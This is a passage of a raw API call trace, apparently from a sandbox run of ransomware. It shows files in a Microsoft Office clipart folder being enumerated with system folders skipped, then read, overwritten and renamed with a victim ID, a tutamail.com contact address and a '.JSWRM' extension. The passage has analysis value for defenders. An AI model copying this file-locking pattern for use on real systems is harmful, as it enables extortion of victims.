lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD08773_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0074.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.553] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24778) returned 1 [0074.553] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60c0) returned 0x24c1d0 [0074.553] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x60c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x60c0, lpOverlapped=0x0) returned 1 [0074.556] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.556] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x60c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x60c0, lpOverlapped=0x0) returned 1 [0074.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.556] CloseHandle (hObject=0x460) returned 1 [0074.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0074.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0074.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0074.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0074.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0074.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.557] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0074.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.558] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbb7c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD08808_.WMF", cAlternateFileName="")) returned 1 [0074.558] lstrcmpiW (lpString1="BD08808_.WMF", lpString2=".") returned 1 [0074.558] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="..") returned 1 [0074.558] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="...") returned 1 [0074.558] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="windows") returned -1 [0074.558] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="recovery") returned -1 [0074.558] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="perflogs") returned -1 [0074.558] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="documents and settings") returned -1 [0074.558] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.558] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="system volume information") returned -1 [0074.558] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="msocache") returned -1 [0074.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0074.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08808_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08808_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD08808_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0074.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08808_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08808_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD08808_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.558] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=47996) returned 1 [0074.559] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbb70) returned 0x24c1d0 [0074.559] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xbb70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xbb70, lpOverlapped=0x0) returned 1 [0074.563] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.563] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xbb70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xbb70, lpOverlapped=0x0) returned 1 [0074.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.563] CloseHandle (hObject=0x460) returned 1 [0074.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0074.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0074.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0074.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0074.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0074.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0074.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0074.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.564] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0074.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.565] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d0e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD08868_.WMF", cAlternateFileName="")) returned 1 [0074.565] lstrcmpiW (lpString1="BD08868_.WMF", lpString2=".") returned 1 [0074.565] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="..") returned 1 [0074.565] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="...") returned 1 [0074.565] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="windows") returned -1 [0074.565] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="recovery") returned -1 [0074.565] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="perflogs") returned -1 [0074.565] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="documents and settings") returned -1 [0074.565] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.565] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="system volume information") returned -1 [0074.565] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="msocache") returned -1 [0074.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08868_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08868_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD08868_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08868_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08868_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD08868_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.565] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=40206) returned 1 [0074.566] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9d00) returned 0x24c1d0 [0074.566] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x9d00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x9d00, lpOverlapped=0x0) returned 1 [0074.569] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.569] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x9d00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x9d00, lpOverlapped=0x0) returned 1 [0074.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.570] CloseHandle (hObject=0x460) returned 1 [0074.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0074.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0074.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0074.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0074.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0074.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.570] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0074.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.571] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd4897d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd4897d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbaaa, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD09031_.WMF", cAlternateFileName="")) returned 1 [0074.571] lstrcmpiW (lpString1="BD09031_.WMF", lpString2=".") returned 1 [0074.571] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="..") returned 1 [0074.571] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="...") returned 1 [0074.571] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="windows") returned -1 [0074.571] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="recovery") returned -1 [0074.571] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="perflogs") returned -1 [0074.571] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="documents and settings") returned -1 [0074.571] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.571] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="system volume information") returned -1 [0074.571] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="msocache") returned -1 [0074.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0074.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09031_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09031_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD09031_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0074.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0074.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09031_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09031_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD09031_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0074.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.638] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=47786) returned 1 [0074.638] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbaa0) returned 0x24c1d0 [0074.638] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xbaa0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, 